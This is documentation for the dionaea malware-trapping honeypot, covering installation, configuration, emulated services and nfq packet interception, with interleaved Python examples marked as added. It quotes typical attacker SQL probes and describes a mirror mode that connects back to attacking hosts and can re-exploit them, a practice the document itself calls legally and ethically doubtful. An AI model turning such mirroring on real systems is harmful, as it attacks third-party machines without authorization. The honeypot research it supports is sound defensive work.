DIONAEA(1) dionaea DIONAEA(1)


dionaea - dionaea Documentation

Dionaea is meant to be a nepenthes successor. It embeds Python as its scripting language, uses libemu to detect shellcode, and supports IPv6 and TLS.

WARNING:
    The documentation is work in progress.

Introduction

How it works
dionaea's intention is to trap malware exploiting vulnerabilities exposed by services offered to a network; the ultimate goal is gaining a copy of the malware.

Security
As software is likely to have bugs, bugs in software offering network services can be exploitable, and dionaea is software offering network services, it is likely that dionaea has exploitable bugs.

Of course we try to avoid them, but if nobody failed when trying hard, we would not need software such as dionaea.

So, in order to minimize the impact, dionaea can drop privileges and chroot.

To be able to run certain actions which require privileges after dionaea has dropped them, dionaea creates a child process at startup and asks that child process to run the actions which require elevated privileges. This does not guarantee anything, but it should be harder to gain root access to the system from an unprivileged user in a chroot environment. Anything the child will do on request is reachable from a compromised main process, so the set of privileged actions it offers should stay as small as possible.

Network Connectivity
Given the software's intended use, network I/O is crucial. All network I/O happens in the main process in a so-called non-blocking manner. To understand non-blocking, imagine you have many pipes in front of you; each pipe can send you something, and you can put something into it. If you want to put something into a pipe while it is full, you would have to wait; if you want to get something from a pipe and there is nothing there, you would have to wait too. Doing this pipe game non-blocking means you never wait for the pipes to become readable or writable: you get something off a pipe once data arrives, and you write once the pipe is no longer full. If you want to write a large chunk to a pipe and the pipe fills up after a small piece, you note the rest of the chunk you wanted to write and wait for the pipe to become ready again.

DNS resolution is done using libudns, a neat non-blocking DNS resolving library with support for AAAA records and chained CNAMEs. So much about non-blocking.

dionaea uses libev to get notified once it can act on a socket, read or write.

dionaea can offer services via TCP/UDP and TLS for IPv4 and IPv6, and can apply rate limiting and accounting limits per connection to TCP and TLS connections, if required.
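The pending-write bookkeeping described above, as an added example that is not dionaea's code: a small non-blocking writer built on Python's selectors module (standing in for libev) and a socketpair (standing in for a real network socket). The class and function names are ours; the amount of data pushed through is chosen so that it exceeds the kernel socket buffer and the "note the rest and wait" path is actually taken.

```python
"""Non-blocking write with a pending buffer, the pattern described above.

Added example, not dionaea code. selectors stands in for libev, a socketpair
for a network socket. Names (NonBlockingWriter, pump) are ours.
"""
import selectors
import socket


class NonBlockingWriter:
    """Queue bytes for a non-blocking socket and flush whenever it is writable."""

    def __init__(self, sock, selector):
        sock.setblocking(False)
        self.sock = sock
        self.selector = selector
        self.pending = bytearray()   # the "rest of the chunk" we could not write yet
        self.registered = False      # are we waiting for a writable event?

    def send(self, data):
        """Try to write now; whatever does not fit is noted in self.pending."""
        self.pending += data
        self._flush()

    def _flush(self):
        """Write as much as the kernel accepts; never block."""
        while self.pending:
            try:
                n = self.sock.send(self.pending)
            except BlockingIOError:
                break                    # socket buffer full: wait for writability
            del self.pending[:n]         # a short write leaves the remainder queued
        if self.pending and not self.registered:
            self.selector.register(self.sock, selectors.EVENT_WRITE, self._flush)
            self.registered = True
        elif not self.pending and self.registered:
            self.selector.unregister(self.sock)
            self.registered = False


def pump(total_bytes, chunk=64 * 1024):
    """Push total_bytes through a socketpair while the reader drains slowly.

    Returns the number of bytes received; equal to total_bytes when the
    pending-buffer logic works. The payload is constructed filler.
    """
    a, b = socket.socketpair()
    b.setblocking(False)
    sel = selectors.DefaultSelector()
    writer = NonBlockingWriter(a, sel)
    received = 0

    def on_readable():
        nonlocal received
        try:
            data = b.recv(chunk)
        except BlockingIOError:
            return
        received += len(data)

    sel.register(b, selectors.EVENT_READ, on_readable)
    writer.send(b"A" * total_bytes)   # far more than the socket buffer holds
    while writer.pending or received < total_bytes:
        for key, _mask in sel.select(timeout=1):
            key.data()                # dispatch to the registered callback
    sel.close()
    a.close()
    b.close()
    return received
```

The writer never loops on a full socket: a short write leaves the remainder in `pending` and registers interest in writability, and the reader side draining the buffer is what makes the event loop call `_flush` again.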

Installation
At the time of writing the best choice to install dionaea on a server is to use Ubuntu 14.04, but below you can find how to install it (from source) on other distributions/operating systems.

Basic stuff
Download the source code
You can download the source code from the release page or by using the git command.

    git clone https://github.com/DinoTools/dionaea.git
    cd dionaea

Arch Linux
Packages for dionaea are available from the Arch User Repository (AUR). Use a package manager like yaourt that can handle and install packages from the AUR.

Before you start, install the required build tools.

    $ yaourt -S base-devel

After the requirements have been installed successfully you can install dionaea. This will check out the latest sources from the git repository, run the build process and install the package.

    $ yaourt -S dionaea-git

After the installation has been completed you may want to edit the config file /etc/dionaea/dionaea.conf. If everything looks fine the dionaea service can be started by using the following command.

    $ sudo systemctl start dionaea

The log files and everything captured can be found in the directory /var/lib/dionaea/.

Ubuntu 16.04
From Source
Before you start, download the source code of dionaea.

Install the required build dependencies before configuring and building dionaea (ttf-liberation is only required by util/gnuplotsql.py).

    sudo apt-get install \
        autoconf \
        automake \
        build-essential \
        check \
        cython3 \
        libcurl4-openssl-dev \
        libemu-dev \
        libev-dev \
        libglib2.0-dev \
        libloudmouth1-dev \
        libnetfilter-queue-dev \
        libnl-3-dev \
        libpcap-dev \
        libssl-dev \
        libtool \
        libudns-dev \
        python3 \
        python3-dev \
        python3-bson \
        python3-yaml \
        ttf-liberation

After all dependencies have been installed successfully, run autoreconf to build or rebuild the build scripts.

    autoreconf -vi

Run configure to configure the build scripts.

    ./configure \
        --disable-werror \
        --prefix=/opt/dionaea \
        --with-python=/usr/bin/python3 \
        --with-cython-dir=/usr/bin \
        --with-ev-include=/usr/include/ \
        --with-ev-lib=/usr/lib \
        --with-emu-lib=/usr/lib/libemu \
        --with-emu-include=/usr/include \
        --with-nl-include=/usr/include/libnl3 \
        --with-nl-lib=/usr/lib

Now you should be able to run make to build and make install to install the honeypot.

    make
    sudo make install

The new honeypot can be found in the directory /opt/dionaea.

Ubuntu 14.04
Package based
Nightly packages are provided in a Personal Package Archive (PPA). Before you start you should update all packages to get the latest security updates.

    $ sudo apt-get update
    $ sudo apt-get dist-upgrade

First of all, install the tools to easily manage PPA resources.

    $ sudo apt-get install software-properties-common

After the required tools have been installed you can add the PPA and update the package cache.

    $ sudo add-apt-repository ppa:honeynet/nightly
    $ sudo apt-get update

If everything worked without any errors you should be able to install the dionaea package.

    $ sudo apt-get install dionaea

After the installation has been completed you may want to edit the config file /etc/dionaea/dionaea.conf. If everything looks fine the dionaea service can be started by using the following command.

    $ sudo service dionaea start

The log files can be found in the directory /var/log/dionaea/, and everything else captured and logged by the honeypot can be found in the directory /var/lib/dionaea/.

From Source
Before you start, download the source code of dionaea.

Install the required build dependencies before configuring and building dionaea.

    $ sudo apt-get install \
        autoconf \
        automake \
        build-essential \
        check \
        cython3 \
        libcurl4-openssl-dev \
        libemu-dev \
        libev-dev \
        libglib2.0-dev \
        libloudmouth1-dev \
        libnetfilter-queue-dev \
        libnl-dev \
        libpcap-dev \
        libssl-dev \
        libtool \
        libudns-dev \
        python3 \
        python3-dev \
        python3-bson \
        python3-yaml

After all dependencies have been installed successfully, run autoreconf to build or rebuild the build scripts.

    autoreconf -vi

Run configure to configure the build scripts.

    ./configure \
        --disable-werror \
        --prefix=/opt/dionaea \
        --with-python=/usr/bin/python3 \
        --with-cython-dir=/usr/bin \
        --with-ev-include=/usr/include \
        --with-ev-lib=/usr/lib \
        --with-emu-lib=/usr/lib/libemu \
        --with-emu-include=/usr/include \
        --with-nl-include=/usr/include/libnl3 \
        --with-nl-lib=/usr/lib

Now you should be able to run make to build and make install to install the honeypot.

    make
    sudo make install

The new honeypot can be found in the directory /opt/dionaea.

3rd-party packages
The packages below are provided by third parties, which is appreciated. If you have compiled a package for your own distribution, just send me the link or make a pull request.

Configuration
If you want to change the software, it is really important to understand how it works, so please take the time to read how it works. dionaea.cfg is the main configuration file. In the example below you can see the default configuration.

dionaea.cfg:

    [dionaea]
    download.dir=/var/lib/dionaea/binaries/
    modules=curl,python,nfq,emu,pcap
    processors=filter_streamdumper,filter_emu

    listen.mode=getifaddrs
    # listen.addresses=127.0.0.1
    # listen.interfaces=eth0,tap0

    # Country
    # ssl.default.c=GB
    # Common Name/domain name
    # ssl.default.cn=
    # Organization
    # ssl.default.o=
    # Organizational Unit
    # ssl.default.ou=

    [logging]
    default.filename=/var/log/dionaea/dionaea.log
    default.levels=all
    default.domains=*

    errors.filename=/var/log/dionaea/dionaea-errors.log
    errors.levels=warning,error
    errors.domains=*

    [processor.filter_emu]
    name=filter
    config.allow.0.protocols=smbd,epmapper,nfqmirrord,mssqld
    next=emu

    [processor.filter_streamdumper]
    name=filter
    config.allow.0.types=accept
    config.allow.1.types=connect
    config.allow.1.protocols=ftpctrl
    config.deny.0.protocols=ftpdata,ftpdatacon,xmppclient
    next=streamdumper

    [processor.streamdumper]
    name=streamdumper
    config.path=/var/lib/dionaea/bistreams/%Y-%m-%d/

    [processor.emu]
    name=emu
    config.limits.files=3
    #512 * 1024
    config.limits.filesize=524288
    config.limits.sockets=3
    config.limits.sustain=120
    config.limits.idle=30
    config.limits.listen=30
    config.limits.cpu=120
    #// 1024 * 1024 * 1024
    config.limits.steps=1073741824

    [module.nfq]
    queue=2

    [module.nl]
    # set to yes in case you are interested in the mac address of the remote (only works for lan)
    lookup_ethernet_addr=no

    [module.python]
    imports=dionaea.log,dionaea.services,dionaea.ihandlers
    sys_paths=default
    service_configs=/etc/dionaea/services-enabled/*.yaml
    ihandler_configs=/etc/dionaea/ihandlers-enabled/*.yaml

    [module.pcap]
    any.interface=any


dionaea
download.dir
    Global download directory used by some ihandlers.

listen.mode
    There are basically three modes in which dionaea can bind the services to IP addresses.

    · getifaddrs - auto
      This will get a list of all IP addresses of all available interfaces and bind the services to each IP. It is also possible to specify a list of interfaces to use with the listen.interfaces parameter.

    · manual - your decision
      In this mode you have to specify an additional parameter, listen.addresses. This is a comma separated list of IP addresses dionaea should bind the services to.

    · nl - requires a list of interfaces
      You have to specify a comma separated list of interface names with the listen.interfaces parameter. If an IP address is added to or removed from an interface, dionaea will launch or stop all services for this IP.

modules
    Comma separated list of modules.

processors
    Comma separated list of processors.

ssl.default.c
    Two letter id of the country.

ssl.default.cn
    The Common Name/domain name of the generated SSL/TLS certificate.

ssl.default.o
    The organization name.

ssl.default.ou
    The name of the organizational unit.

Logging
dionaea has a general application log. These logs are meant to be used for debugging and to track errors. It is not recommended to analyse these files to track attacks.

filename
    The filename of the logfile.

levels
    Only log messages that match the specified log levels get logged to the logfile.

    Available log levels:

    · debug
    · info
    · warning
    · error
    · critical
    · all = special log level including all log levels

    Examples: Log only messages with level warning and error.

        errors.levels=warning,error

    Log all messages but exclude messages with log level debug.

        errors.levels=all,-debug

domains
    Only log messages in a specified domain.

Modules
Only modules specified by the modules value in the dionaea section are loaded during start up.

Every module might have its own config section with additional config parameters. The section name consists of the prefix module and the module name separated by a dot (.).

See the module documentation to find more information on how to configure the modules.

Processors
The specified processors will be used as the entry point in the processing pipeline. In most cases the initial processor will be a filter processor. The next processor in the pipeline is specified by the next parameter.

See the processor documentation to find more information on how to configure the processors.
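The dotted keys in the [processor.*] sections above (config.allow.0.types, config.allow.1.protocols, ...) describe lists of rules. The following added example, which is not dionaea's own parser, turns such a section into nested lists and dicts and evaluates it against a connection. The filter semantics are an assumption made here for illustration: a connection is handed to the next processor when it matches at least one allow rule and no deny rule, and within a rule every listed field must match. The section text is an excerpt of the default configuration shown above.

```python
"""Parse dionaea.cfg-style dotted keys and evaluate a filter processor section.

Added example, not dionaea's own parser. The filter semantics are an
assumption: a connection passes when it matches at least one allow rule and
no deny rule; within a rule every listed field must match.
"""
import configparser

# Constructed excerpt of the default configuration shown above.
SAMPLE_CFG = """
[processor.filter_streamdumper]
name=filter
config.allow.0.types=accept
config.allow.1.types=connect
config.allow.1.protocols=ftpctrl
config.deny.0.protocols=ftpdata,ftpdatacon,xmppclient
next=streamdumper
"""


def expand_dotted(section):
    """Turn {'config.allow.0.types': 'accept', ...} into nested dicts/lists.

    Every leaf becomes a list of strings (comma separated values), and any
    dict whose keys are all digits becomes a list ordered by index.
    """
    root = {}
    for key, value in section.items():
        parts = key.split(".")
        node = root
        for part in parts[:-1]:
            node = node.setdefault(part, {})
        node[parts[-1]] = [v.strip() for v in value.split(",")]
    return _listify(root)


def _listify(node):
    """Recursively convert dicts whose keys are all digits into lists."""
    if not isinstance(node, dict):
        return node
    if node and all(k.isdigit() for k in node):
        return [_listify(node[k]) for k in sorted(node, key=int)]
    return {k: _listify(v) for k, v in node.items()}


def rule_matches(rule, conn):
    """All fields listed in the rule must match the connection's attributes."""
    return all(conn.get(field) in values for field, values in rule.items())


def filter_passes(cfg, conn):
    """Decide whether the filter hands the connection to the next processor."""
    allow = cfg.get("allow", [])
    deny = cfg.get("deny", [])
    allowed = not allow or any(rule_matches(r, conn) for r in allow)
    denied = any(rule_matches(r, conn) for r in deny)
    return allowed and not denied


def load_filter(text, section_name):
    """Return (config, next_processor) for one [processor.*] section."""
    # interpolation=None: the real config contains '%Y-%m-%d' in config.path
    parser = configparser.ConfigParser(interpolation=None)
    parser.optionxform = str          # keep key case as written
    parser.read_string(text)
    section = expand_dotted(dict(parser[section_name]))
    return section["config"], section["next"][0]
```

A connection here is just a dict of attributes such as {"types": "accept", "protocols": "smbd"}; with the section above, accepted connections of every protocol except the denied ones pass, and outgoing (connect) connections pass only for ftpctrl.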

Run
The software has some flags you can provide at startup; the -h flag shows the help, and -H includes the default values.

    $ /opt/dionaea/bin/dionaea -H
      -c, --config=FILE                use FILE as configuration file
                                       Default value/behaviour: /opt/dionaea/etc/dionaea/dionaea.cfg
      -D, --daemonize                  run as daemon
      -g, --group=GROUP                switch to GROUP after startup (use with -u)
                                       Default value/behaviour: keep current group
      -G, --garbage=[collect|debug]    garbage collect, usefull to debug memory leaks,
                                       does NOT work with valgrind
      -h, --help                       display help
      -H, --large-help                 display help with default values
      -l, --log-levels=WHAT            which levels to log, valid values
                                       all, debug, info, message, warning, critical, error
                                       combine using ',', exclude with - prefix
      -L, --log-domains=WHAT           which domains use * and ? wildcards, combine using ',',
                                       exclude using -
      -u, --user=USER                  switch to USER after startup
                                       Default value/behaviour: keep current user
      -p, --pid-file=FILE              write pid to file
      -r, --chroot=DIR                 chroot to DIR after startup
                                       Default value/behaviour: don't chroot
      -V, --version                    show version
      -w, --workingdir=DIR             set the process' working dir to DIR
                                       Default value/behaviour: /opt/dionaea

examples:

    # dionaea -l all,-debug -L '*'
    # dionaea -l all,-debug -L 'con*,py*'
    # dionaea -u nobody -g nogroup -w /opt/dionaea -p /opt/dionaea/var/run/dionaea.pid

Note that -u/-g and -r are independent: the last example drops privileges but does not chroot.
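The levels and domains syntax is the same for the [logging] section and the -l/-L flags: entries combined with ',', exclusions with a '-' prefix, and '*'/'?' wildcards for domain names. The following added example, not dionaea's own parser, implements that syntax as a filter predicate; the level list is taken from the -H output above. The precedence rule is an assumption made here: exclusions are applied after inclusions, so "all,-debug" and "-debug,all" mean the same thing.

```python
"""Parse the levels/domains syntax shared by [logging] and the -l/-L flags.

Added example, not dionaea's own parser. Assumption: exclusions ('-' prefix)
are applied after inclusions, regardless of their position in the list.
"""
import fnmatch

# Level names as listed by `dionaea -H`.
LEVELS = ("debug", "info", "message", "warning", "error", "critical")


def _split_spec(spec):
    """'a,-b, c' -> (['a', 'c'], ['b'])"""
    include, exclude = [], []
    for entry in spec.split(","):
        entry = entry.strip()
        if not entry:
            continue
        (exclude if entry.startswith("-") else include).append(entry.lstrip("-"))
    return include, exclude


def parse_levels(spec):
    """'all,-debug' -> {'info', 'message', 'warning', 'error', 'critical'}"""
    include, exclude = _split_spec(spec)

    def expand(names):
        out = set()
        for name in names:
            out |= set(LEVELS) if name == "all" else {name}
        unknown = out - set(LEVELS)
        if unknown:
            raise ValueError("unknown log level(s): %s" % ", ".join(sorted(unknown)))
        return out

    return expand(include) - expand(exclude)


def make_domain_matcher(spec):
    """'con*,py*,-python.db' -> predicate(domain) using * and ? wildcards."""
    include, exclude = _split_spec(spec)

    def matches(domain):
        if any(fnmatch.fnmatchcase(domain, pat) for pat in exclude):
            return False
        return any(fnmatch.fnmatchcase(domain, pat) for pat in include)

    return matches


def make_log_filter(levels_spec, domains_spec):
    """Return predicate(level, domain) -> bool for one logging target."""
    levels = parse_levels(levels_spec)
    domain_ok = make_domain_matcher(domains_spec)
    return lambda level, domain: level in levels and domain_ok(domain)
```

Unknown level names are rejected rather than silently ignored, which is the behaviour you want from a startup-time check of a config file.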

Utils
A list of applications and tools to collect information exported by dionaea.

DTAG Community Honeypot Project
The DTAG Community Honeypot Project was started in 2010 by a small group of enthusiasts at Deutsche Telekom. They maintain T-Pot, a multi-honeypot platform. It is based on well established honeypots including dionaea.

· Website: DTAG Community Honeypot Project
· Status: active

DionaeaFR
DionaeaFR is a web frontend to display attack information. It uses the SQLite database provided by the log_sqlite ihandler.

· Website: DionaeaFR
· Status: unmaintained since 2014

DIY with log_json
You can use the log_json incident handler in combination with an ELK stack to collect, aggregate and visualize attack information.

· Website: ELK stack
· Status: active

Modern Honey Network (mhn)
A tool to deploy honeypots, collect attack information and display aggregated statistics.

· Website: Modern Honey Network
· Status: active, but deploys a pre-0.2 (2014) version of dionaea by default.

Modules
The subsection's name is the name of the module dionaea will try to load. Most modules have rather simple names: the pcap module uses libpcap, the curl module libcurl, the emu module libemu ... The python module is special, as it can load Python scripts which offer services, and each service can have its own options.

List of available modules

curl
The curl module is used to transfer files from and to servers; it is used to download files via HTTP as well as to submit files to third parties.

emu
The emu module is used to detect, profile and, if required, execute shellcode.

pcap
The pcap module uses the libpcap library to detect rejected connection attempts, so even if we do not accept a connection, we can use the information that somebody wanted to connect there.

python
The python module allows using the Python interpreter in dionaea and allows controlling some scripts dionaea uses.
Services
Network services speak a certain language; this language is called a protocol. When we started deploying honeypots, you could trap worms just by opening a single port and waiting for them to connect and send you a URL where you could download a copy of the worm. The service getting attacked was the backdoor of the Bagle mail worm, and it did not require any interaction. Later on, the exploitation of real services got more complex, and you had to reply something to the worm to fool it. Nowadays worms use the API of the service before sending their payload. To allow easy adjustments to the protocol, dionaea implements the protocols in Python. There is a glue layer between the network layer, which is written in C, and the embedded Python scripting language, which allows using the non-blocking connections from Python. This has some benefits: for example we can use non-blocking TLS connections in Python, and we even get rate limiting on them (if required), which Python's own I/O does not offer. On the other hand, it is much more comfortable to implement protocols in Python than doing the same in C.

List of available services

Black hole
The black hole service can be used to bind a service to a port. The service does not respond to any submitted data, but the bistreams can be used to create new modules.

Example config
services/blackhole.yaml:

    - name: blackhole
      config:
        services:
          # Telnet
          - port: 23
            protocol: tcp

          # DNS
          - port: 53
            protocol: udp
          - port: 53
            protocol: tcp

          # NTP
          - port: 123
            protocol: udp

EPMAP
Example config
services/epmap.yaml:

    - name: epmap

FTP
Dionaea provides a basic FTP server on port 21; it can create directories and upload and download files. From my own experience there are very few automated attacks on FTP services, and I have yet to see something interesting happening on port 21.

Example config
services/ftp.yaml:

    - name: ftp
      config:
        root: /var/lib/dionaea/roots/ftp
        response_messages:
          welcome_msg: 220 DiskStation FTP server ready.

HTTP
Dionaea supports HTTP on port 80 as well as HTTPS, but there is no code making use of the data gathered on these ports. For HTTPS, a self-signed SSL certificate is created at startup.

Configure
Example configuration:

    - name: http
      config:
        root: "var/dionaea/wwwroot"

default_headers
    Default header fields are sent if none of the other header patterns match.

global_headers
    Global header fields are added to all response headers.

headers
    List of header fields to be used in the response header. Only applied if filename_pattern, status_code and methods match. The first match in the list is used.

max_request_size
    Maximum size in kbytes of the request. 32768 = 32MB

root
    The root directory to serve files from.

Example config
services/http.yaml:

    - name: http
      config:
        root: "/var/lib/dionaea/roots/www"
        ports:
          - 80
        ssl_ports:
          - 443
        max_request_size: 32768 # maximum size in kbytes of the request (32MB)
        global_headers:
          - ["Server", "nginx"]
        headers:
          - filename_pattern: ".*\\.php"
            headers:
              - ["Content-Type", "text/html; charset=utf-8"]
              - ["Content-Length", "{content_length}"]
              - ["Connection", "{connection}"]
              - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
        # soap_enabled: false
        template:
          # set to true to enable template processing
          # this feature requires jinja2 template engine http://jinja.pocoo.org/
          enabled: false
          file_extension: .j2
          path: "/var/lib/dionaea/share/python/http/template/nginx"
          templates:
            autoindex:
              filename: autoindex.html.j2
            error_pages:
              - filename: error.html.j2
              # - filename: error/{code}.html.j2
          # used to specify additional template values
          values:
            # full_name: nginx/1.1

Additional examples
Set the Server response field.

    - name: http
      config:
        global_headers:
          - ["Server", "nginx"]

Define headers to use if the filename matches a pattern.

    - name: http
      config:
        headers:
          - filename_pattern: ".*\\.php"
            headers:
              - ["Content-Type", "text/html; charset=utf-8"]
              - ["Content-Length", "{content_length}"]
              - ["Connection", "{connection}"]
              - ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"]
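How the headers, default_headers and global_headers options combine, as an added example that is not dionaea's http service: the first headers entry whose filename_pattern, status_code and methods all match wins, default_headers are used when none matches, global_headers are added to every response, and the {content_length}/{connection} placeholders are filled in. The config dict mirrors the example above; the match rules (regular expression over the whole request path, filters optional and absent means "any") and the function names are assumptions made here.

```python
"""Select response headers the way the http service options above describe.

Added example, not dionaea's http service. Assumptions: filename_pattern is a
regular expression matched against the whole request path; status_code and
methods are optional filters (absent means any); the first matching entry
wins; default_headers apply when nothing matches; global_headers are added
to every response; {content_length} and {connection} are str.format fields.
"""
import re

# Constructed config mirroring the example above, plus a default_headers list.
HTTP_CONFIG = {
    "global_headers": [["Server", "nginx"]],
    "default_headers": [
        ["Content-Type", "text/html; charset=utf-8"],
        ["Content-Length", "{content_length}"],
        ["Connection", "{connection}"],
    ],
    "headers": [
        {
            "filename_pattern": r".*\.php",
            "methods": ["GET", "POST"],
            "headers": [
                ["Content-Type", "text/html; charset=utf-8"],
                ["Content-Length", "{content_length}"],
                ["Connection", "{connection}"],
                ["X-Powered-By", "PHP/5.5.9-1ubuntu4.5"],
            ],
        },
    ],
}


def _entry_matches(entry, path, method, status):
    """True when every filter present on the entry matches the request."""
    pattern = entry.get("filename_pattern")
    if pattern is not None and not re.fullmatch(pattern, path):
        return False
    codes = entry.get("status_code")
    if codes is not None:
        codes = codes if isinstance(codes, list) else [codes]
        if status not in codes:
            return False
    methods = entry.get("methods")
    if methods is not None and method not in methods:
        return False
    return True


def build_headers(config, path, method, status, content_length, keep_alive):
    """Return the list of (name, value) pairs for one response."""
    chosen = config.get("default_headers", [])
    for entry in config.get("headers", []):
        if _entry_matches(entry, path, method, status):
            chosen = entry["headers"]        # first match wins
            break
    values = {
        "content_length": content_length,
        "connection": "keep-alive" if keep_alive else "close",
    }
    out = [(n, v.format(**values)) for n, v in config.get("global_headers", [])]
    out += [(n, v.format(**values)) for n, v in chosen]
    return out
```

The point of the per-pattern headers is consistency of the fake: a request for a .php file that comes back without an X-Powered-By header, or with a Content-Length that does not match the body, is a cheap tell for a scanner fingerprinting the "nginx" it thinks it found.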

Memcache
Dionaea can emulate a very basic memcached server.

Configure
Example config
services/memcache.yaml:

    - name: memcache

Mirror
Example config
services/mirror.yaml:

    - name: mirror

MongoDB
This module adds initial support for emulating a MongoDB server in the dionaea honeypot. At the moment it is very limited, and the functionality might be improved in one of the next releases.

Requirements
· bson module for Python 3

Example config
services/mongo.yaml:

    - name: mongo

MQTT
Example config
services/mqtt.yaml:

    - name: mqtt

MSSQL
This module implements the Tabular Data Stream (TDS) protocol, which is used by Microsoft SQL Server. It listens on tcp/1433 and allows clients to log in. It can decode queries run on the database, but as there is no database, dionaea cannot reply, and there is no further action. Typically we always get the same query:

    exec sp_server_info 1
    exec sp_server_info 2
    exec sp_server_info 500
    select 501,NULL,1 where 'a'='A'
    select 504,c.name,c.description,c.definition from master.dbo.syscharsets c,master.dbo.syscharsets c1,master.dbo.sysconfigures f where f.config=123 and f.value=c1.id and c1.csid=c.id
    set textsize 2147483647
    set arithabort on

Refer to the blog <http://carnivore.it/2010/09/11/mssql_attacks_examined> for more information. Patches would be appreciated.

Example config
services/mssql.yaml:

    - name: mssql

MySQL
This module implements the MySQL wire protocol, backed by SQLite as the database. Please refer to 2011-05-15 Extending Dionaea <http://carnivore.it/2011/05/15/extending_dionaea> for more information.

Example config
services/mysql.yaml:

    - name: mysql
      config:
        databases:
          information_schema:
            path: ":memory:"
          # example how to extend this
          # just provide a databasename and path to the database
          # the database can be altered by attackers, so ... better use a copy
          # psn:
          #   path: "/path/to/cc_info.sqlite"

nfq
The Python nfq script is the counterpart to the nfq module. While the nfq module interacts with the kernel, the nfq Python script takes care of the required steps to start a new service on the ports. nfq can intercept incoming TCP connections during the TCP handshake, giving your honeypot the possibility to provide a service on ports which are not served by default.

As dionaea can neither predict which protocol will be spoken on unknown ports nor implement the protocol by itself, it will connect to the attacking host on the same port and use the attacker's server-side protocol implementation to reply to the attacker's client requests. Therefore dionaea can end up re-exploiting the attacker's machine, just by sending back the exploit it sent us.

The technique is a brainchild of Tillmann Werner, who used it within his honeytrap <http://honeytrap.carnivore.it> honeypot. Legal boundaries to such behaviour may differ in each country, as may the ethical boundaries for each individual. From a technical point of view it works and gives good results. Learning from the best, I decided to adopt this technique for dionaea. Besides the legal and ethical issues with this approach, there are some technical things which have to be mentioned.

port scanning
    If your honeypot gets port scanned, it would open a service for each port scanned; in the worst case you would end up offering 64k services per IP scanned. By default you would run out of file descriptors at about 870 services offered and experience weird behaviour. Therefore the impact of port scanning has to be limited. The KISS approach taken here is a sliding window of throttle.window seconds. Each slot in this sliding window represents a second, and we increment this slot for each connection we accept. Before we accept a connection, we check whether the sum of all slots is below throttle.limits.total; if not, we do not create a new service. If the sum is below the limit, we check whether the current slot is below the slot limit too; if both conditions hold, we create a new service. If one of the conditions fails, we do not spawn a new service and let nfqueue process the packet. There are two ways to process packets which got throttled:

    · NF_ACCEPT (=1), which will let the packet pass the kernel; as there is no service listening, the packet gets rejected.

    · NF_DROP (=0), which will drop the packet in the kernel; the remote does not get any answer to its SYN.

    I prefer NF_DROP, as port scanners such as nmap tend to limit their scanning speed once they notice packets get lost.

recursive-self-connecting
    Assume some shellcode or download instruction makes dionaea

    · connect to itself on an unbound port

    · nfq intercepts the attempt

    · spawns a service

    · accepts the connection #1

    · creates a mirror connection for connection #1 by connecting to the remote host (itself) on the same port #2

    · accepts connection #2 as connection #3

    · creates a mirror connection for connection #3 by connecting to the remote host (itself) on the same port #4

    · ...

    Such a recursive loop has to be avoided for obvious reasons. Therefore dionaea checks whether the remote host connecting to an nfq mirror is a local address using getifaddrs and drops local connections.
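The two safeguards just described, the sliding-window throttle and the local-address check, as one added example that is not dionaea's nfq script. The throttle keeps one counter per second over a window of throttle.window seconds, refuses to spawn when the window total or the current slot is at its limit, and reports the netfilter verdict (NF_DROP by default, as recommended above) for throttled SYNs. The interface (try_accept/decide), the way the window is advanced and the local address set being passed in rather than read via getifaddrs are assumptions made here; the addresses in the test are documentation ranges, constructed.

```python
"""Sliding-window spawn throttle and self-connect guard for nfq-style services.

Added example, not dionaea's nfq script. Assumed interface: the throttle is
asked once per intercepted SYN and answers (spawn?, verdict). The local
address set is passed in (constructed) instead of being read via getifaddrs.
"""
import ipaddress

NF_DROP = 0      # throttled SYN is dropped, remote sees packet loss
NF_ACCEPT = 1    # throttled SYN passes the kernel and gets a RST (no listener)


class SpawnThrottle:
    """One slot per second over a window of `window` seconds."""

    def __init__(self, window, limit_total, limit_slot, verdict=NF_DROP):
        self.window = window
        self.limit_total = limit_total   # throttle.limits.total
        self.limit_slot = limit_slot     # per-second limit
        self.verdict = verdict           # what to do with throttled packets
        self.slots = [0] * window
        self.last_tick = None

    def _advance(self, now):
        """Zero every slot we skipped since the last call; return the current index."""
        now = int(now)
        if self.last_tick is None:
            self.last_tick = now
        elapsed = now - self.last_tick
        if elapsed >= self.window:
            self.slots = [0] * self.window        # whole window expired
        else:
            for t in range(self.last_tick + 1, now + 1):
                self.slots[t % self.window] = 0   # reuse slot for a new second
        self.last_tick = now
        return now % self.window

    def try_accept(self, now):
        """Return (spawn, verdict). The connection is counted only if we spawn."""
        idx = self._advance(now)
        if sum(self.slots) >= self.limit_total or self.slots[idx] >= self.limit_slot:
            return False, self.verdict
        self.slots[idx] += 1
        return True, NF_ACCEPT


def is_local(remote_ip, local_addrs):
    """True for our own addresses (the getifaddrs check) and for loopback."""
    addr = ipaddress.ip_address(remote_ip)
    return addr.is_loopback or addr in {ipaddress.ip_address(a) for a in local_addrs}


def decide(throttle, remote_ip, local_addrs, now):
    """Combine both checks: never mirror ourselves, then apply the throttle."""
    if is_local(remote_ip, local_addrs):
        return False, NF_DROP
    return throttle.try_accept(now)
```

The per-slot limit is what stops a single fast scanner from filling the whole window within one second; the total limit caps the number of mirror services created in any window regardless of how the SYNs are spread out.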
848
849 So much about the known problems and workarounds …
850
851 If you read that far, you want to use it despite the techni‐
852 cal/legal/ethical problems. So … You’ll need iptables, and you’ll have
853 to tell iptables to enqueue packets which would establish a new connec‐
854 tion. I recommend something like this:
855
856 iptables -t mangle -A PREROUTING -i eth0 -p tcp -m socket -j ACCEPT
857 iptables -t mangle -A PREROUTING -i eth0 -p tcp --syn -m state --state NEW -j NFQUEUE --queue-num 5
858
859 Explanation:
860
861 1. ACCEPT all connections to existing services
862
863 2. enqueue all other packets to the NFQUEUE
864
865 If you have dionaea running on your NAT router, I recommend something
866 like:
867
868 iptables -t mangle -A PREROUTING -i ppp0 -p tcp -m socket -j ACCEPT
869 iptables -t mangle -A PREROUTING -i ppp0 -p tcp --syn -m state --state NEW -j MARK --set-mark 0x1
870 iptables -A INPUT -i ppp0 -m mark --mark 0x1 -j NFQUEUE
871
872 Explanation:
873
874 1. ACCEPT all connections to existing services in mangle::PREROUTING
875
876 2. MARK all other packets
877
878 3. if we see these marked packets on INPUT, queue them
879
880 Using something like:
881
882 iptables -A INPUT -p tcp --tcp-flags SYN,RST,ACK,FIN SYN -j NFQUEUE --queue-num 5
883
884 will enqueue /all/ SYN packets to the NFQUEUE, once you stop dionaea
